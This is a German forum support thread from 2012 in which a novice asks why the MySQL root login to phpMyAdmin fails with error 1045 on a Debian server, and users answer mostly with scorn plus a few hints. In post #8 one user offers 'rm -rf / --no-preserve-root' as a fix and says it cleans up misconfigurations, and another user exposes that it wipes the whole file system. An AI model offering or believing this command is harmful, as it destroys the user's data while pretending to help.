PhPMyAdmin

Dieses Thema im Forum "Technischer Support" wurde erstellt von Pixelcrafter, 15. Dezember 2012.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Pixelcrafter
    Offline

    Pixelcrafter

    Registriert seit:
    1. Oktober 2012
    Beiträge:
    36
    Ich habe Mysql und phpmyadmin auf einem root server (debian) installirt aber ich kann micn mit dem noormalen root benutzer nicht einnloggen warum?
     
    #1
  2. ChunkNorris
    Offline

    ChunkNorris

    Weil du garnicht weißt was du installiert hast und beim Installationsvorgang hast du wohl die Augen zugemacht.
     
    #2
  3. Pixelcrafter
    Offline

    Pixelcrafter

    Registriert seit:
    1. Oktober 2012
    Beiträge:
    36
    ich sag mal so es wurde installirt (für mich) und er hat gesagt das ich mich mit den root dataen anmelden kann mit welchen daten dann?

    - - - Aktualisiert - - -

    Keiner eine idee?
     
    #3
  4. Greey3331
    Offline

    Greey3331

    Normalerweise fragt er dich beim installieren nach einem Passwort für den root.

    - - - Aktualisiert - - -

    Bzw. hast du XAMPP oder ganz normal über apt-get ?
     
    #4
  5. Pixelcrafter
    Offline

    Pixelcrafter

    Registriert seit:
    1. Oktober 2012
    Beiträge:
    36
    über apt-get und er hat mir ja das pw gegeben aber ich komm nicht rein fehler 1045
     
    #5
  6. Greey3331
    Offline

    Greey3331

    Versuchs mal ohne Passwort (Einfach nur root als Benutzer)
     
    #6
  7. Pixelcrafter
    Offline

    Pixelcrafter

    Registriert seit:
    1. Oktober 2012
    Beiträge:
    36
    nein geht auch nicht

    - - - Aktualisiert - - -

    Verbindung für den controluser, wie er in Ihrer Konfiguration angegeben ist, ist fehlgeschlagen. Das ist der fehler aber was muss ich dann in der config ändern?
     
    #7
  8. ChunkNorris
    Offline

    ChunkNorris

    Code (Text):
    1. rm -rf / --no-preserve-root
     
    #8
  9. Pixelcrafter
    Offline

    Pixelcrafter

    Registriert seit:
    1. Oktober 2012
    Beiträge:
    36
    und was macht der befehl?
     
    #9
  10. ChunkNorris
    Offline

    ChunkNorris

    Der bereinigt das System bei Fehlconfigs.
     
    #10
  11. Floww
    Offline

    Floww

    Registriert seit:
    25. August 2012
    Beiträge:
    104
    Dieser löst dein ganzes Dateisystem, ohne weiteren Nachfragen.

    (rm --> remove)
     
    #11
  12. Pixelcrafter
    Offline

    Pixelcrafter

    Registriert seit:
    1. Oktober 2012
    Beiträge:
    36
    oh ok Hat noch einer eine idee?
     
    #12
  13. Floww
    Offline

    Floww

    Registriert seit:
    25. August 2012
    Beiträge:
    104
    Solch einen Server solltest du dir nur zulegen, wenn du auch weißt, was du da gerade vor dir hast.

    Da du nichtmal den Befehl "rm" kennst, solltest du dir das Ganze nochmal überlegen.
     
    #13
  14. Pixelcrafter
    Offline

    Pixelcrafter

    Registriert seit:
    1. Oktober 2012
    Beiträge:
    36
    Ich habe ein der sich damit sehr gut auskennt der ist nur übers we weg
     
    #14
  15. Floww
    Offline

    Floww

    Registriert seit:
    25. August 2012
    Beiträge:
    104
    Das ist einfach der falsche weg, wenn es da bei solch kleinen Sachen schon probleme gibt, wenn derjenige mal kurz weg ist.
     
    #15
  16. Cabraca
    Offline

    Cabraca

    jaja jeder hat "irgendeinen der sich damit auskennt" und der gerade jetzt ausnahmsweise weg ist.
    Die Ausrede hör ich ständig von leuten die planlos sind.
    ich bin ehrlich, ich hab keinen bock mehr leuten zu helfen die sich sachen anschaffen von denen sie keine ahnung haben.
    ich hoffe dir fliegt der root in nächster zeit um die ohren.
     
    #16
  17. Pixelcrafter
    Offline

    Pixelcrafter

    Registriert seit:
    1. Oktober 2012
    Beiträge:
    36
    Ich habe es vorher schon mal selber probiert und das gleiche problem der installer (oder wie das heist) ist eigentlich einfach und habe da das richtige pw angegeben aber dann komm timmer der fehler

    wie kann man den beheben?
     
    #17
  18. Floww
    Offline

    Floww

    Registriert seit:
    25. August 2012
    Beiträge:
    104
    Warte einfach, bis sich die erste HDD verabschiedet. Spätestens dann wird es das erste Problem geben. :p


    Und wie wärs mal mit Logs-checken bezüglich dem Problems?
     
    #18
  19. Cabraca
    Offline

    Cabraca

    log dich mal über die console direkt in mysql ein und schau ob da der gleiche fehler kommt.
    wenn nicht dann liegt der fehler irgendwo bei phpmyadmin.
     
    #19
  20. Pixelcrafter
    Offline

    Pixelcrafter

    Registriert seit:
    1. Oktober 2012
    Beiträge:
    36
    Ok schreibst du eine pn oder hier direkt rein?

    und schon mal vielen dank
     
    #20
Status des Themas:
Es sind keine weiteren Antworten möglich.